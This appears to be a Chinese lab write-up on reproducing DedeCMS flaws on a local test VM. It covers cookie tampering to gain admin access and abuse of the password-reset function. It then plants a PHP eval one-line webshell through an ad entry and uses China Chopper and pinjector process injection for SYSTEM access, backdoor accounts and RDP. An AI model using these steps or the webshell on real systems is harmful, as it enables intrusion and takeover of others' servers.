渗透测试实战--dedecms漏洞复现

实验设备:一台windows服务器,一台kali,一台windows客户端

在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5
物理机安装jdk,建立java环境,由此来运行菜刀

在这里插入图片描述
网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机登录这个网站(刚开始就点下一步下一步,中间要设置root密码,里面也会显示admin密码)

在这里插入图片描述

我们注册一个用户000001,密码为123123,一个test用户,密码为123123
在admin后台将自己设置为会员,现实中就相当于自己充值会员,拥有会员权限
将用户设置为000001是因为管理员的用户是1所以通过抓包将自己的用户名变为1

在这里插入图片描述

登录自己的账号
在这里插入图片描述
打开burpsuite抓包

在这里插入图片描述
点击个人空间
在这里插入图片描述

取cookie中的last_vid__ckMd5 值 替换dedeuserid_ckMd5值 和Dedeuserid改为00001
在这里插入图片描述

然后on放过,别点forword
在这里插入图片描述
出来后发现已经是admin登录了
发生了越权
在这里插入图片描述
F12修改这三处
在这里插入图片描述
进入网站主页观看

在这里插入图片描述

运行重置密码链接,抓包
192.168.10.5/dedecms/member/resetpassword.php?dopost=safequestion&safequestion=0.0&id=1
在这里插入图片描述
ctrl+R
在这里插入图片描述

进入repeater然后确认下面三个数据和之前要求的一样然后直接点go
在这里插入图片描述
出现右边的数据
把图中的url修改,amp;去掉
如下,抓到的这是一个临时修改密码的url
http://192.168.10.5/dedecms/member/resetpassword.php?dopost=getpasswd&id=1& key=ro0tKeP6
进入网页可以修改密码
在这里插入图片描述
在这里插入图片描述
修改成功

这个密码只能在这个网页临时登录,不能推出从外面登录,因为这只是个临时密码

进入dede直接进入后台
在这里插入图片描述
新建广告
在这里插入图片描述

添加广告
在内容中输入一句话木马

<?php @eval($_POST[cmd]);?>

在这里插入图片描述
提交后出现一个路径
在这里插入图片描述
打开中国菜刀,将上面的路径填在url后

在这里插入图片描述
连接成功

在这里插入图片描述

提权

将pinjector拖入
用进程注入提权
在这里插入图片描述

pinjector -l
查看所有进程的权限
在这里插入图片描述
找到system权限的进程
在这里插入图片描述
pinjector -p 进程的UID cmd 4567

在这里插入图片描述

kali端监听
在这里插入图片描述
写一个脚本
内容为:关防火墙
开3389端口
创建用户
加入管理员组

在这里插入图片描述
用中国菜刀把脚本拖入目标
在kali中打开脚本

在这里插入图片描述
主机进行远程连接
在这里插入图片描述
连接成功
在这里插入图片描述

  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值